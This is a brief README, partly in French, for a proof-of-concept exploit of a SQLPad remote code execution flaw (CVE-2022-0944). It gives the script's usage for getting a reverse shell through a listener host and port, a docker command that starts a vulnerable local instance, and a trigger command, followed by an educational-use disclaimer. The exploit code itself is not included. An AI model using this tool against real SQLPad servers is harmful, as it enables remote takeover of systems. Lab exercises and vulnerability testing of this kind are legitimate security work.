
Un exploit de preuve de concept pour SQLPad RCE (CVE-2022-0944).
Un exploit de preuve de concept pour SQLPad RCE (CVE-2022-0944)
usage: main.py [-h] url lhost lport [username] [password]
positional arguments:
url URL to SQLPad
lhost Listener host address for reverse shell
lport Listener port for reverse shell
username login username (optional)
password login password (optional)
options:
-h, --help show this help message and exit
Exemple :
# install requirements
pip install -r requirements.txt
# start sqlpad docker container
docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:6.10.0
# trigger exploit
./main.py http://localhost:3000 127.0.0.1 1337 admin admin
Ce dépôt contient du code et des outils destinés exclusivement à des fins éducatives, plus précisément à une utilisation dans le cadre de cours de cybersécurité et d'environnements d'apprentissage. L'auteur de ce code décline toute responsabilité quant aux conséquences découlant de l'utilisation, de la mauvaise utilisation ou de la modification de ce code. Ce code est fourni « tel quel », sans aucune garantie, expresse ou implicite, y compris, mais sans s'y limiter, les garanties implicites de qualité marchande ou d'adéquation à un usage particulier.